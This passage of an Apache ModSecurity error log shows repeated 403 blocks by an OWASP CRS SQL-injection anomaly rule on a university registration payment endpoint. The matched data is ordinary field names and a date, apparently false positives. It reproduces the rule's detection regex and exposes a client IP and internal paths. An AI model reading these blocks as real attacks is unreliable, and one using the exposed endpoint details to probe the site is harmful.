[Tue Aug 29 09:41:30.046589 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2sCo-f0AAPlpRhEAAAAS"]
[Tue Aug 29 09:41:30.226515 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2sCo-f0AAPlpRhIAAAAS"]
[Tue Aug 29 09:41:30.420761 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2sCo-f0AAPlpRhMAAAAS"]
[Tue Aug 29 09:41:30.605626 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2sCo-f0AAPlpRhQAAAAS"]
[Tue Aug 29 09:41:30.790333 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2sCo-f0AAPlpRhUAAAAS"]
[Tue Aug 29 09:41:30.963435 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2sCo-f0AAPlpRhYAAAAS"]
[Tue Aug 29 09:41:31.318497 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a28Co-f0AAPlpRhcAAAAS"]
[Tue Aug 29 09:41:31.500803 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a28Co-f0AAPlpRhgAAAAS"]
[Tue Aug 29 09:41:31.822677 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a28Co-f0AAPlpRhkAAAAS"]
[Tue Aug 29 09:41:32.014995 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3MCo-f0AAPlpRhoAAAAS"]
[Tue Aug 29 09:41:32.215633 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3MCo-f0AAPlpRhsAAAAS"]
[Tue Aug 29 09:41:32.542293 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3MCo-f0AAPlpRhwAAAAS"]
[Tue Aug 29 09:41:32.714540 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3MCo-f0AAPlpRh0AAAAS"]
[Tue Aug 29 09:41:32.926213 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3MCo-f0AAPlpRh4AAAAS"]
[Tue Aug 29 09:41:33.238087 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3cCo-f0AAPlpRh8AAAAS"]
[Tue Aug 29 09:41:33.573058 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3cCo-f0AAPlpRiAAAAAS"]
[Tue Aug 29 09:41:33.764708 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3cCo-f0AAPlpRiEAAAAS"]
[Tue Aug 29 09:41:33.980600 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3cCo-f0AAPlpRiIAAAAS"]
[Tue Aug 29 09:41:34.073185 2023] [:error] [pid 63692] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:tglkuitansi. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS:tglkuitansi: 2023-08-29T00:00:00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/save"] [unique_id "ZO1a3sCo-f0AAPjMteAAAAAn"]
[Tue Aug 29 09:41:34.172829 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id 